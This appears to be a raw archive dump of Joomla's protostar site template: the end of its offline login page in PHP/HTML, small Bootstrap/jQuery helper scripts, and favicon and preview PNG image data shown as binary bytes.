	$logo = '<img src="' . JUri::root() . $this->params->get('logoFile') . '" alt="' . $sitename . '" />';
}
elseif ($this->params->get('sitetitle'))
{
	$logo = '<span class="site-title" title="' . $sitename . '">' . htmlspecialchars($this->params->get('sitetitle')) . '</span>';
}
else
{
	$logo = '<span class="site-title" title="' . $sitename . '">' . $sitename . '</span>';
}
?>
<!DOCTYPE html>
<html lang="<?php echo $this->language; ?>" dir="<?php echo $this->direction; ?>">
<head>
	<meta name="viewport" content="width=device-width, initial-scale=1.0" />
	<jdoc:include type="head" />
</head>
<body class="site">
	<div class="outer">
		<div class="middle">
			<div class="inner well">
				<div class="header">
				<?php if (!empty($logo)) : ?>
					<h1><?php echo $logo; ?></h1>
				<?php else : ?>
					<h1><?php echo $sitename; ?></h1>
				<?php endif; ?>
				<?php if ($app->get('offline_image') && file_exists($app->get('offline_image'))) : ?>
					<img src="<?php echo $app->get('offline_image'); ?>" alt="<?php echo $sitename; ?>" />
				<?php endif; ?>
				<?php if ($app->get('display_offline_message', 1) == 1 && str_replace(' ', '', $app->get('offline_message')) !== '') : ?>
					<p><?php echo $app->get('offline_message'); ?></p>
				<?php elseif ($app->get('display_offline_message', 1) == 2) : ?>
					<p><?php echo JText::_('JOFFLINE_MESSAGE'); ?></p>
				<?php endif; ?>
				</div>
				<jdoc:include type="message" />
				<form action="<?php echo JRoute::_('index.php', true); ?>" method="post" id="form-login">
					<fieldset>
						<label for="username"><?php echo JText::_('JGLOBAL_USERNAME'); ?></label>
						<input name="username" id="username" type="text" title="<?php echo JText::_('JGLOBAL_USERNAME'); ?>" />

						<label for="password"><?php echo JText::_('JGLOBAL_PASSWORD'); ?></label>
						<input type="password" name="password" id="password" title="<?php echo JText::_('JGLOBAL_PASSWORD'); ?>" />

						<?php if (count($twofactormethods) > 1) : ?>
						<label for="secretkey"><?php echo JText::_('JGLOBAL_SECRETKEY'); ?></label>
						<input type="text" name="secretkey" autocomplete="one-time-code" id="secretkey" title="<?php echo JText::_('JGLOBAL_SECRETKEY'); ?>" />
						<?php endif; ?>

						<input type="submit" name="Submit" class="btn btn-primary" value="<?php echo JText::_('JLOGIN'); ?>" />

						<input type="hidden" name="option" value="com_users" />
						<input type="hidden" name="task" value="user.login" />
						<input type="hidden" name="return" value="<?php echo base64_encode(JUri::base()); ?>" />
						<?php echo JHtml::_('form.token'); ?>
					</fieldset>
				</form>
			</div>
		</div>
	</div>
</body>
</html>
PK!��A�{{protostar/js/classes.jsnu&1i�// Add classes

window.onload=function() {
var input = document.getElementsByTagName("input");
for (var i = 0; i < input.length; i++) {
    if (input[i].className === 'button') {
        input[i].className = 'btn btn-primary';
    }
}

var button = document.getElementsByTagName("button");
for (var i = 0; i < input.length; i++) {
    if (button[i].className === 'button') {
        button[i].className = 'btn btn-primary';
    }
}

var p = document.getElementsByTagName("p");
for (var i = 0; i < p.length; i++) {
    if (p[i].className === 'readmore') {
        p[i].className = 'btn';
    }
}

var table = document.getElementsByTagName("table");
for (var i = 0; i < table.length; i++) {
    if (table[i].className === 'category') {
        table[i].className = 'table table-striped';
    }
}

var ul = document.getElementsByTagName("ul");
for (var i = 0; i < ul.length; i++) {
    if (ul[i].className === 'actions') {
        ul[i].className = 'nav nav-pills';
    }
}

var ul = document.getElementsByTagName("ul");
for (var i = 0; i < ul.length; i++) {
    if (ul[i].className === 'pagenav') {
        ul[i].className = 'pagination';
    }
}
};PK!D�;���protostar/js/application.jsnu&1i�$('.dropdown-toggle').dropdown()
$('.collapse').collapse('show')
$('#myModal').modal('hide')
$('.typeahead').typeahead()
$('.tabs').button()
$('.tip').tooltip()
$(".alert-message").alert()PK!1�protostar/js/template.jsnu&1i�/**
 * @package     Joomla.Site
 * @subpackage  Templates.protostar
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 * @since       3.2
 */

jQuery(function($) {
	"use strict";

	$(document)
		.on('click', ".btn-group label:not(.active)", function() {
			var $label = $(this);
			var $input = $(document.getElementById($label.attr('for')));

			if ($input.prop('checked')) {
				return;
			}

			$label.closest('.btn-group').find("label").removeClass('active btn-success btn-danger btn-primary');

			var btnClass = 'primary';


			if ($input.val() != '')
			{
				var reversed = $label.closest('.btn-group').hasClass('btn-group-reversed');
				btnClass = ($input.val() == 0 ? !reversed : reversed) ? 'danger' : 'success';
			}

			$label.addClass('active btn-' + btnClass);
			$input.prop('checked', true).trigger('change');
		})
		.on('click', '#back-top', function (e) {
			e.preventDefault();
			$("html, body").animate({scrollTop: 0}, 1000);
		})
		.on('subform-row-add', initButtonGroup)
		.on('subform-row-add', initTooltip);

	initButtonGroup();
	initTooltip();

	// Called once on domready, again when a subform row is added
	function initTooltip(event, container)
	{
		$(container || document).find('*[rel=tooltip]').tooltip();
	}

	// Called once on domready, again when a subform row is added
	function initButtonGroup(event, container)
	{
		var $container = $(container || document);

		// Turn radios into btn-group
		$container.find('.radio.btn-group label').addClass('btn');

		$container.find(".btn-group input:checked").each(function()
		{
			var $input  = $(this);
			var $label = $(document.querySelector('label[for=' + $input.attr('id') + ']'));
			var btnClass = 'primary';

			if ($input.val() != '')
			{
				var reversed = $input.parent().hasClass('btn-group-reversed');
				btnClass = ($input.val() == 0 ? !reversed : reversed) ? 'danger' : 'success';
			}

			$label.addClass('active btn-' + btnClass);
		});
	}
});
PK!"
����protostar/favicon.iconu&1i��PNG


IHDR�asRGB���	pHYs��$iTXtXML:com.adobe.xmp<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 5.4.0">
   <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
      <rdf:Description rdf:about=""
            xmlns:tiff="http://ns.adobe.com/tiff/1.0/"
            xmlns:exif="http://ns.adobe.com/exif/1.0/"
            xmlns:dc="http://purl.org/dc/elements/1.1/"
            xmlns:xmp="http://ns.adobe.com/xap/1.0/">
         <tiff:ResolutionUnit>2</tiff:ResolutionUnit>
         <tiff:Compression>5</tiff:Compression>
         <tiff:XResolution>72</tiff:XResolution>
         <tiff:Orientation>1</tiff:Orientation>
         <tiff:YResolution>72</tiff:YResolution>
         <exif:PixelXDimension>16</exif:PixelXDimension>
         <exif:ColorSpace>1</exif:ColorSpace>
         <exif:PixelYDimension>16</exif:PixelYDimension>
         <dc:subject>
            <rdf:Seq/>
         </dc:subject>
         <xmp:ModifyDate>2015:03:15 13:03:46</xmp:ModifyDate>
         <xmp:CreatorTool>Pixelmator 3.3.1</xmp:CreatorTool>
      </rdf:Description>
   </rdf:RDF>
</x:xmpmeta>
>Iv]XIDAT8}�]h\E�ϙ�{wﺻI]m�XClK4�RE�w-E��(->�f|)y�~(Z�"ȢA�R�h�Z�B46M��-$ӆ6&-k41����c�xn��S��\����s��g;^��t}�Pc{���յ��
׽�uQ��{VJ�5"I"�:�����X���7���O))����:L;�j8�lQ�P ��%!��럒|2��qye��4��m�m<3�@�!��$�+c粒���J�ۤ-S�R��Hk�A8$��k���
)��[�O�/�ov,�6�˔�}�O0|�
��n�����N�ҀF�{Ӂ�{ǽLK�)��{�|�G�� ʭ�"W���?��X-����Y�W�~Rn�2�˰o.� x�*S߇�Kê:
�4`DF�oԝ.(Y�&pKq��ѵX�n���9�bbn��|��cc�N��ݛZĴ�&��ܖۑ�t�B���Trj]ޱ*�Sxqd�w?��	p�|���n�)3^E8Y��⑷g"rU`Wn�A�O�5���?�H�lpY[��Q8��+��]��r�q�oޱe��t����j	Z�G�O\}�����r���7�wَ�C����V6t�b70j�#Ū�!��_WH+��R����F&/������Ϗ��j.9W���xZA!�/�W>	`[�X;���GP���w6�V���R�{4w�e��WD�0�Α�h�������Lȣ��%J�Л��z����=i ZϰŠ��Q����^"���O:58՛�k��~h���l`M��ǽS�qV1DZ���m���hb��w�yu�K����o��;�������DS(IEND�B`�PK!�ş����protostar/template_preview.pngnu&1i��PNG


IHDR��)����IDATx���,�D��,m8�r��o$?��ێ�� b�~I${@9$��1��O@�Sr!ל�ؗ�r�	Z%���$�T$�(�~����u���m�LE'�vAv�.�9~5WA�pn��g�|���%º޼jx�ӫ�����?�/�ԅ+yAH �t�;Dr7���+j��>�;-EB�;�u���=AIj2c)t���ү^(�J�W�b�sȫPIB.t+�!6M�z���;�H�B�<G2���Ô䞷,�ʏ�||��?�+lx���t.�&�,RPu��Iz]j����@.U�T&�4��}�a�J2��Z�FRd��r}�Ƿy�-�o��.���2��蒍�
��<\_�$�"��U\��U+���9�IQ٤�����G�y�V�v��+I5`�\��ա7�=�������9�2���q-!ӷ��
�ҩɀs��,�FfgP>��Y}Q�d١��7�l$�y��n]���T��p�m��Ȅ	�t���K�bS��3�`�q4�Ig���f�<1�Nn�w�$�I�R���ְ�=�C��hi�R�n�#����Q������6��@�X6���{0�4E]@�"{�<�K�s��8���94H8�GjJ3�t�Bx�����1v)��3Ͽ���	SCfF@KgW�(Ip�"� ^h!M�F�g
B�ʠ͎�����J)�7���(t��(��|�]����N��&ϙ���_.� F��+���\�$�
�U5Ca���f:0Iеt����c�mJ�ž�$�(,�RN	������7�N;3w���� Sf�9�*Eb��T�����>���=��ҫ$���a���t��A?ȝ�d��
����� �H����X��Ь���m�u	,�.�2��g�b?�gV�An��WI�7�Xt	�쪪�M�;Q�L�Sf�f8�Ѱ�G��N�4%|k߮��rrM<��9)�-q�
f��u*$Z�MhvZ�!�k}$$�!7%@�#�BH�Ӧ���Ƿ������6k�3�rk��g0[_33lUN��}䗋���:jU_��E(:��vE۠(������D���r�P:�0Ȕ�fN:��\`�I
��@QINy�Ms9�p�q�H�rҺ�;�h�LP�Tu'�:[ˉ��#p;GV��ma��Ȑ����[sM�p}��O�DE�0�������L���j\!tTX@@\�.5�sھ��
'jn�{w2=�j��k�;irJ���E�r���&�]5��v�P&�̏�wS6�����q��>�W�F{��/W�l�U���뢈�Ng�t=��M6F�uAh��[��-�q����>��^���Ù�����0���)U6c�grpuNUR,���oMT4�I^��[���:�O�����K}P'sQ�(�ڱ�.��>����%�F$jA{/�1����P���Y��#l���g*g�O#:5��YI�S`��P	��;��^�VY�Ci��_jx�_A\5ͫ��l���晔LZ�G�'�T�t�5!^�S���?�������Һ�ϘtTU
}���̳C7e����E��^K�^��2ha|OXHl]�E�n,}n+�/r�*�,�UXD6����vPɼU�{5M=iořg��U�P8�Cڊx��;w*"�"m����Tf�ިnD�-3��}�L���"�
�ZJ�~胄Zw~�ZZ���n�m܆_V@��n�n*��W[q[��e��
����K���J�}-��ȍL���Jo�&�HdCi�t�`��\ڙ�B����؆�> �Bu)(Z$����?xF	��)�
($�Gj�����J���;��r�.�'w*�L8Tt��¸�X�P�٩�#g�� �4�QP��[&��oM�U2�R @6l*�po2
�B�B3#+���|�և�5��1|h�*���90}�{~�!���z�J�'��=����.�뫵ٯ{�>||
�B5o*R$��9-)�;��腃^!�M�y%I�I8>d�x�P]���jwW��X�;�����a��
���
*�@(8���`��JF"�U�bJ�I�"�V*�}Ǿ
���6����a�M)h:��!
6f,Ckznu|�5|
*F��d%!���Ţ���H�#x<�������.������ɦ��	���5�\A϶��_Hx�ي�y9�N�9���X@87�N��sB.�%�)j�::%��uǻ���}���tw�%N�b3r̒4n��6�@3zNbj�Jʋ:a��#�0���f��!�KT�e2������h]�F#_֦�������H7T��KΏ��������7��Q���9h���|W�����#mD;�֢݊C �cq}��%��$52L����?�L�F���VWh�P�b���țT�(&`Y��w��rХ,�F�7����|0#�J�Z�*˃o�
v`��&�T4�P��o������¾L���xY��b�������������>eg��$��Ĭ�#�C�9�9)�H��ܩ�ނ�j��m��N�	�L"i�钎�r��T3h�Gٱ�ǜɒ�,Y�Q �Ԡ9>!gȧ=��8�9u��r���8=�j��s�����������Q�Q�}�����_Wd���f�����3�B��T�җ��<?VQbB)�ݧH$��	[��J4U]��zձ+���pӦ�M[�����G]8Q���e��d|��ƪ@���{Z�'���n�%=L{;�嚜+z�m���53��
�I>�"��g��z��GR_H�W��!i•��b��e�z��.�m������U�(�N�t�a/�f�Zs}h��CW+a�^����5̍(_a}1��Tjd�X1��3L]#��Gt���TɈ�`��_�+>��M���ֿ�����m*���<�/�r�&�����ڙ�A��M���}�dkd�����	�M	y�9����"4�`�f9Hd�-'/V_���+V$��Ul������ݛ:��x�t%�~�bn�kA-���uI�xR���R@՝�}��M#��uS���C�n�)J��S�N�x�>"�E4�C�_*-��Ǫ�Iݶ���՗���f.���'��٣��l�;���>'��\�,�P٣�t��w]���J R�Re�6"�?�O���D��Iys݋]�I�=<���9�ɫ�ћ���#Y�9�)Ǵݓ&�i�u����j�g��1}r!�^�������,�w?���:)��q�e����kR�b�7�����YI�>r��C�lf��<h���G�N�z������ҧ��G9x+* �H�ԁW����:
��'_=��+�s0��A^)I��at\�=A�B���?�I����+�e�A�K2k.��<�}Y��uy�!�%�3SJ�Da�ь�/wD��<4I{����Z|�_]�ޥ�/�@�b��i���HN�Y�1k�H�\��\�g/�g�*_�0���\��3�ի�gث�M2�{�o��t}�t���Z�$k����-���қ6�G�
�Yh�7����R�;���F8Ӊ��3��a�#��W!����(\�>�W\���A`ٕa���F���~�o;#�2�����
���$�K7"_<ת�P�k�<X@�8n�W�c��Z>�T��Z
�)�L 	�Gx�£�`�"�3�݊��P�"�Y1\.s��b|�Jõ�گ��Rۛ�� `�v��]M+��"̉��饡&����u���5�"�%��95�|@u��z�T��C���`�=%��_��jl�<��:��|j���h�e�\̐r��{3� F��ԇG�kM]�����H
�1yx�O�W~-Sֽ���2���!�k��gt���]`��;pS�WN���U�4���Q�������Z1��������2&�-�4<��M���yfى�I�h4�g�:Q׍�%��It���>�U��$ι�u&CR�d}k4��KX���{^~b�'�
�_���p;�b�멸�+�P���c0�u2\��J��]����DI��!�U������B���m���,]r�zIy�V�ZG���r8��݊�]J}`���K�9ݸ42*���t�ϫpqW�ᔼ�Tk�0�g
>=��6ճò���>���)g���c?��\$QV���c�vU+GD�9�ſi�e���@�O�m��1Hi�"Q̤Cky
)Y�彟�`Ͽ�y���fo����*k�|��Z��p��1$�Q���ynK��
���+�����
�B�pZ4��N�E-�=b̫Km����܎+�u�MH�PQliCZ��}�=Z�!'�;�E�ʆew�SB�:j�+�⁂��Q�i�%�f�~�G��L������7��a�4E$
��VqAX�p3�QA�$_��6��k@`��[�m_��g���/A���R:���(��}��ԕ(��u�v�
J%U&sF^�q�Oe�t>�����<O���n�V6�V%y��8I㰣Hx�D�;"��+W�UU��O��F)w5j(��׹��>yY�+vg۵�[��e�Y��� � �#6��5�OyH�iHy>�}&5�U�J�\�R�Ôޙ>#K�A9&򱎼�9k@X��� ��|p[3�K�4`�8��_yO����� ��E4~^�vg�r�t��=vM]���$�z��U�F>�g���u{
X�2�㚩����r���1�4�z��L0��^����+gK�6S9O�E
R�SN�1\�ep��u��Z��8iܼ��8�g��v;�n_��H��v�;�A{�'Ar���[����z%�)��.����|<ZNj
j_6��T�dWޤ��fl�5�Cn�;%�ru��lƃ�.�޹:̪����3�MW�T@>��N���k)�rξ�(�/��5�Pm�I\t���٦�{9Z�v�`�k$�Q{�ٖ�΄#��@΍�F�����Y�L��e�n,�)�s��U�!Ku���\�KQ�����X�O#]3�;�kL�kf��(���2��?�ϫ5�z�>��O����O��C��a����FRd-�A�%ɐBHL��G�R!7"u/�$�hjʟ$��n�㩾\8=�}E��}OC�m��ݷ4�w�0�|Cnp�U��[��%��:I�E�<r��^�(�$���AUF�J�Bo:��~x�E�{��aɒ�]\�[C"�eI�B5�xs�-;�4�<Yx���a��LS�D(�}��Q>�QO���k^r[��6b3
'gj��c��o�R��/��H��bw��R{#���[����U�9�c]]�qA�j�����y�����e���y��i���yw��k�� �Ķ��X�󩮝;�2����}#���mYki���,��W����}U��v;~a�[>f��ޭ,�X.��������%mZ��?�n�1�DQ�LN�("�����2���56��1��I{Y�C`m���d����t{�j�f�0ұ#��r����Ao��{���V�U
?B=!���ot���Ea�[�������(���X�$�<�(��rYn��`����F����m�fw
|n~א���\cxr��oo���^���v�����Ƙ�?��{,*�y���/��b]�ge���Z��˹/�]asxbJ9��Nv���C�Djyy��(I~��/���M�o��GN��^O����K�����1Eɉw~��Ǥ��K��n�韾�I��<�6w8箽��Aѣ]kX���&*��RH�4ɺ�򾁶la,m�g�'��l@��a���Zk4�Ea"{�rb�8{ �#��V`����C��`�7�ǭ��qn���M;�����Z���TE�#k���<m�1�2�`�SQv
�`���!/���]R�7�k�j�\��d�v�Ȯ�v�2N��j���k�(&����S��^�pu@eնw����_��םN��O��mns]�۳��)����T~�L���|Z���ګ\�2R��*�,V7L��iJDɚ�o?�����!Ox�տ��/��{���ژ8��?����G�������c߽~�fk��={>��w���=s�/~��Kw�ͽ{YWXq
Uӄ�h�ܟ-����o^I�
�#A��a���
��30M����b`��U;����j<���٫-����W`�/�D���y�3����=�1w�z��͛69���L�&�~�5�fb,޳kך��ͭ����"��\y�����	�!d�5��%Gf��!@l �9{�k40W���:A�[����՟�!*�#�=߈��O�4�㩩���~��ȅ��OM�)/~}#�*��.�e��ކ��Y�ȭ�19g�,�Q�]�$���Ò8���wf����ʙc�N
-\�����>�&m��UW�ez�Cc�.�zarl���[��co����zw�L���|>���Ϊ ��6��:Im4�ͫj%2��R�#��
K.#����x�Er�T�u���dA���/�'�;L�l�ث=A�\�"ӟ��O����h�q��W�v-y��Io���ܩ(�IϞt��k�~��u����<(�u�ŕUo�ju��H��W-gؚP�v�=�,����FV���2*�j�c�	�R���xW�i�V�d���C�z��I?�siiibb����ڵ+I���>:˲^���Z�tq��Z�	?���>���a�e%��:�����w#�K��mg���u�j��2�h�N8Am۶��}K���]E6�^��ۨ6lP�?v�LOv�ˑ5��5�n�ɩIj�n_M��z�K��B������${]mB�P5K<l1d�[��<A8\���|Ʉ�k���\�
ʭ�%��J�j�#+w{�L1��\��Q_i�h�ݦ�5��>�}�����ͩ������^���O;��ˮ�����x������Rl3��d={��VS��?��uT��]����r�[Y�2{�k���k��]���.�7�k��k0[���U�%�I�l۶mnnn~~��#�������t���eeg�u��o�ȑ��E�*z0j�^���Q�
ɒ���%�p�-�[�y��q>�1t����Kg����59}H��Q�;1s�Kv��i:�Ϝ\����܆�-3{N;p墚����n��wr�1焪�8��Zg�*\ɫ^6`���ȶ�;G/&����&���7<�d����z�|�ux�����p��\dD����jz������;jMަ_��w�9��V�3���ZgS31>u���r��s�g7g���:E�	��a�K�=�P.���"RfO�W��Y����]2!fy�12{@ؐ=�PB��n9���W���p�����۷o�������޽{�</O���@�`g� KR������S��s��њ���S�p��8
_��ԑ��?��W�3��ǣ4�K�&S��Y��2klE�Ff���D3�kr��)���Kǣ�Z���O���i�^�����U_u
Yĩ�y�
���X�6j���ˤ2�{�:�P�3Ia͠�=�T��	���\9���[��WmO���}^�G�$�,MI�Ik0J?�Ǔ�q��&��<��HS�i?�m�ڰ��̃G1�G�y���=.�P�2���h8�p�Z�h6���Cc���u�;dxB��q�Z�˳^a�F,�r�8>x��;�sk׮���Ͳ̻��_�kw,�(t`S�[�شV�~vD%t���D�H��[�'���wx�����g49��C�x)2���83Y���Q��[���5�5y�9n��j�E:�=�&]�%�&mWF�)�^�PO��ߠ�r��?/g���v���^L�f�v8�Qc��-kr�CZ����v��C�Ŋ������#����ʀ��E�L3d�Kb����Ez��y[��Ğ��6`ʵݲgF�r+[0x2�+�A=�yy>4�۞=����hV��"{�Y��ԑvЕA��Ε�W�LJr�������l�c�(�5lq�a�UB^`�
*�ڞ�%{��c��
gO����=��8�U�E�@�6�c�e��1x��a���s�XT��¸��Ԅ�x��'�s\�,��!A�^�`���a�A���Y���`)6�]C)߿�7��K��P�-���k�s�p����xbbB�J�i��}�#�/}��v,��b���	���)|�R�t����Ŋ��ܱ�����3�"�s.�7�#�g�v��q�wAс�Ap!Rl#=��ߓ�c��Œ�������"�͕���U�P�۝}z��	lЉ.M�4"/�=�r�j~��G5����,k���5�q��ϳ7����?���H��}��Bx�=����;p�B���G���xH�:�
�d
,�����7;�@I��q{ʒ�N�𔵼�p_]a/��˄JPn�oO��������/���.�l��Ez���6�%@�=@
�F�)�_Q���5���%"�j咿��y@^��VU*ګG��^Ɉ^W�9{�wX�}>����8EA��r(����|��=��!�=����p/��Gkx.�c*M��ve�@�]R���Y֏�0x����c�룗	�[�R/��%��<�q{�G�j�M�^^xK��X&�0�,'�+S�A4�m���#߽r*�˻�
�Z����#}Y���暮~���:���d�%��=�U����N���Ksx�r��`���@���!t�����p�7�r�0bc����m�=N�M�q�ZgI�ǵ&�C��ٌ=�	�ٍ���H�x�e���]
!�P�e�Fs
f{@>�k��8-Q���"{��$�+��ƻ:vV��8�T�ҋNt:�"�Wo����>�����e��Sl�Ifl��i��4m�L��!���4�1�1�-�X'��n|�6�Y��o��*��ofg�d}�y����\�LnU��a@���&�̌*mI�p�)�}l_���QO.g�թ�Β�LЊ�羼Y9�[�<�QR�x{�������]|y��;�?���1�n�OC<��OC�s�p[@b�0p�\i��J��.T*��lB��UP��2��BTb�2�1�CH�}�b�{�….\��E��$bg+�)�5P�x� ��-a'ם�R�fX�dTC�,o�Z�`�f$f��<.\�p�b7�5��}!c�L�R�Zdn�*�!"�[��%���9f�,^E��].\�p���B�č��@�Yn+/�r�̉P���Y䊰�! ��0$�}]�p����$ȩD���^9;K56EO��mK��+H��=DBj.\�p�bw�-��N��65�J�*�l�(�������~�;Q��yr�….v/�� j#���Sa�1)ͤ�h)N'*Q��X�v����'���ڮ�C܅.v ���M��4���q)�3qPBA���RN�C�J��>a�VU�Sj��u%�h.��@$�\�p�B����.��z�"�3W�<���-����?%RQ�=��囊�[4��|F���h�f*������.\�p�H��X t��ʬ[����(k��*�.�I���I���p*�
��P��.p�…��_U]-J��8�0Q0��l ˲�4�o6)�7��")����5ۥ�M��L�\ �"HV��(�W��p�1��.\�p��#]���֘�P��Q
~ //���Q��r�i1�6�aX�[mQ����h$3�H$�{<'�rj۬Ѧɪ�/ؤ�6JD��E�P��ؗ
�gUJ�,�!:��.\lڴ������mjjJ$��D���F�х�����ՋMK��HT���
-�L8/>���֯0`@aa{
M���b��$4c��	o[���2
�B�ͬZ�r�I�e�����۷o�6�0C|�t�"����ԺԱ%��� uPBp�2o�p�…�ŋ/_������d�T|i�il3c)�z�l�w�}wذaݺuc����G�p/3�ʙ؝#���߿"�X�v�Z"�ن+���}��ٴqC*�Z�|Y<g��ݻ�`�
��mwiQf�N� SцAc�9��v�����….#v���̙3,X�����C��
b��`���d���x��xࠁ��8fgȜ��L������P ���T���O��0�@����e�/s�t��u�С;vlU�@���D�[˩��j%�M�b�❸p�…�}g̘1k�,�0�JڥK������ƕ+W�X�bժUUUUM��D<��U&�ȥ��RH&S�7m�y���>�²Lg
35�!�AQ`� d�o,:fdl4e�L�%d)Q� }E:%��U<��?�3��������¢��{��Փ)�{a7nd���}ڽg�F�Ǭӿ��h�W����;B����̾6+���,'�v�…����4(��\ǎ�~��ӧWϞL=�7o�w�}?i��իV3� MӁj6�3rE���
N�R�~���m����Ky��4ʉ�enU)L�FܚZ�/#���ję]R��$"�J��ĭ�!/���
:u�4l��c�9z���g_�֯_�lٲw�yg�}��s�0UXМhg,ϼ!?�x����̨;s�x�*ӫ*�h�p���Mk;�)��BZ
o"�+HAGh׋�p�b�c_�i1O�~���[p@Iq�3_}���&$��v�AM�@)%2�@AC 'SR����_fy�a������eTW��.�[���-����.�z*��Ʉ�hY�t��k��/�ѯ_���?�Od��K�N�4�����#�s�h?�
ʩ���@���tg�U:-�p$��e���C?,~'�j��1�ړ�^Ѫ�3��	O�h
��3��F�N\�p���S�N�8qb߾}�/�v�����{tav�ԥ��H�t.�i�\�r�`_%��R}uP�2U�|�\�'ӳM���mT9�3*��H�"w��]���J���ȷ���9䆕�(���y��D(/�H,]�䞻���o��F�
3�9s��N<��(��>�A���:)��wNp�ł��e4�ZQ��a�^�v�/�&�����_�KRQ,%8�9k�d'�.�2�?~<�b�V����Ә1o���4����5��V�l����t(���o�~�N�y.18е��!/��\H�GA���K�$8�
pa1P��	��T 
��d*iY���-.-��k&�K/��g�-//5jTSc�|`���)K�:1P�ԛQ��H�hۧ
@���p�ܶC�L�[�q��T�:�j>�'�'?���3�3u��I#!��a�5�=�X�_�~~�x��$��!�B\�%A��h�7U����Ŏ�˾\Ob���g��ӧOﯿ���+��r��>}���gb�ip�NJ���{*�."1�)ed�Lr�Q�j��[+�lY^���HZVxU�=:H<��À�|؟�F0(�!�pp抲�˿��-����!£�>r��w��#G&�/>���sa�ֵ���Еo2�Z,QXP�[e�;_u�hfR�	xB+��>�_�����|�'�y�O͒�^5_:��.�����?p�T�˳9Q�I����|s�^x���6l�&.\�H ��ik֬7n�<����/����o"���7�����ʺ��v��\f%"�,b������@�n*�4 ��~$�T�0B$�+�2���N��וmq��h�*T��j�~"����/(��{�w1>|x����~�I$�$�-�2▕�pR�3�:A��juFi$ʝ�S�p���;�ɯϗ�u�-�d�Zz7W��EUs~\��>+��'H�B횉�j�%H��I���;KVV,\�b���t,#;=f�[���������=�{��3�?`�e���VR\�`�N�ۑ��…P�Z��J���ꫲ��~��M�2宻��u��L�3R�V����щ�2����&#:շ tP��*d��.�eǰU�F�9�W@
hrZf�<�Ґ_�X�?
_|�yQqѝ��>x��ٳgw�ؑm��e��ZI���فĒ���t�L��t$Q��b�2
;�S��g��˰.5&�EO,���>=P۴�3oL��I�Y�eD�H���P�������k_KZ�1�|w�)W�4u6���scN�����5$'0�}���&Ϛ�,�*+-�TY[�"9��扳aÆM-���2���>c��{����'e�]��@$('�J_D;�d�a�0oi*/�~�D��;�{�t�.A�e;Zm�u�+�!�4��]���EV	bne�f5�0���#Z~�������^�4�N��H$�J0�[r6"�-�fZ��eV/�/P�Ru�x��>�q�F?��������ٜ�.�����8g������/�Z���[F �)�	=�.�{,6VZ_ރ��K�F���?��>�
�>RT�zȮ���k����xHq�G�P�k/:u��y�H\��v���;wvp��Zc�͛73�
�w�s�ڵ���A,RX(J|%�Ld�Edz���l#�L�%�AaLq�z34*4V;�eM֡�N">�j�=1Ȟ�`#QUWҜ%�Q@Z+o+�.��
Mð�mo)��"S��#�<���{3��p�M�zȡ��?n*d�D{�J��+f�T���LH탅�|���MV��Gx4_Y^�7�di��E���<�ۅ:�Sc���s��#�A�^�׹Ik(��C���+	�-b��c_�}w�=��Zl�eg�ᰣڛ�.��:���L�6����d��=�,�ܵ���K���v*�
"�P)U�e2�B@�7�R�S
�d�P�"s,
q�ףʵ�ޮ$�geW�(����l( Rya��������
�G����Ų�K�)7_"�.�k�:�7�%!��*vp1�AK�V��Ua(֟�Wn-�
���RM�^�cNx��H��k�{\Z3zB��ƧL��4�`�$�@\�p��!�9,�5����_^�V�a&芊
f�L&�����(**�>>Ne�D!�sIģV���<���4R�G�'�9
���nCW{T�F�
T��U{~.�'�$����B��&�Jbv�2�@���7cDz}�ՊR`.!�,';T��0	���;�I��6��/4���C�]t-�KA�4oe��L��q�I���)�P~Mս���"�\�2��G����Hi�}��p���|~��O����k�~���?��h9iU��}3���x�_b���{��ɳɤ�1�͏�~��O
����#/^r󿮻����te�!���K�]y�/��_w?����L�����|��/o�w���^sףO���"i<���O��!q�b��iӒ��:d�y�V�TO�4�1��\�b„���ď?|��xX^�	&���/;uQ�F�3-�,�IH��Ei���IZn(�H|G6��Z�S3��jl�*�����T�V7�Qy*�m�vږ=�QV3�
Ys����'�����ey�W�Z�L&y�-'�8��m�o�wj4���5�H,�bZ;@��\�
#�ک�W"�{��z��M��^�hA��߯�{�wpO�L@(��D�ŗ�����{�����f��\1q�ܣ/���.�ۃOO�>������nʬy7=���'\��Kn�>w�P]�����Ϲ�����b���چ�KW1�;�;����K22�o���O��қ��Ӵ_��䊊��x�a��O��������|�3o|���.M��0㼿<0�?�vɆ��,<��[F���k�z짩�6l���3O�G���)W�p�_�8���{捏�;�Ž��\�dE����>}�;o�?wɲ������_��Uѡ�~���Tӂ�<�4�	�@��dξ
P�,ݔ�V����KHj�òwI�kP��!]i����V�@�i���ά/�*�e�`q�x|�&MZ�r+3���W�^ͷ$�
�ᖢ@�#J����su��b2��Z�^g�y.u�#?]e�� ����k_�O�`�#���L�t�ˊ|�YR�����,����+s�X}n�gW�ﲲ҇o����ٵ�X�v�G_Ox��:��W��ܓ�b��WT�v���/�����j��噚;nڜ�>��W�=��9/?|�ǣ�,_���Qþz��>=�d$��|�F��[��54���[��,&i�_��;=��[�{��#)����Ɲw�}�[�:��ط�`su�?L���Wϸ�n��[RT@\��ah��'�������т�{���]��).��� ��E1+���3�����3�D���}�d�B�ٵH>�zU䎴��L�bZ�U�2f�W��Z O��d+2!e�T%- Er��^U�a;�[B� s?S��`8\7i��/�0���`)V$e�B�!���/UDZ[�ia�������l:.���1�����O������ژ%�}>pOz2I<�sO��N��Ւ@�k�~>�w:)�H�y��+����}{L��/=���;��gO|��v%EW�0�q�[��p�����G��{���,�礣�����]p�?x���Sy�w���1��$���O9f���t�y'%ؗap�^�>uoaA�ӯ�N��KƩ,��;e��^������@�v%�����z�{���.v�:t/��9�=�?��,�t�A���սS����

�Ν�b������5���#$Y�Z1�tCAf��`�\�:���%C(�J�)�9@>S��Q^�42å;�o$�@��
!��uPMc
���0���V�a�	��ږ�Z�V�2;�D)�/Ĕ��648�xꧥ��/���wM\�P8n����� �_F�&�?<7�`���/ֿ�F��c��?_���=���m���wF$z�_/�խQ ��k.���?�~r"��<q�O<���DZ��i�~�7?M{��o.8�hWZ���fJ�ԇ(�PV:h@��kֳ�F)���˟�VV�z�UG4���>=�<���O��ą�	��}�8�ޫ9'C�Gsx�
��^�g��i�i"*��@��=OISiQ�5J��l2
����"���&&S��b�l�[�BQU-ٲ,�����R\�z�W��N�B��x����`��
MMMR
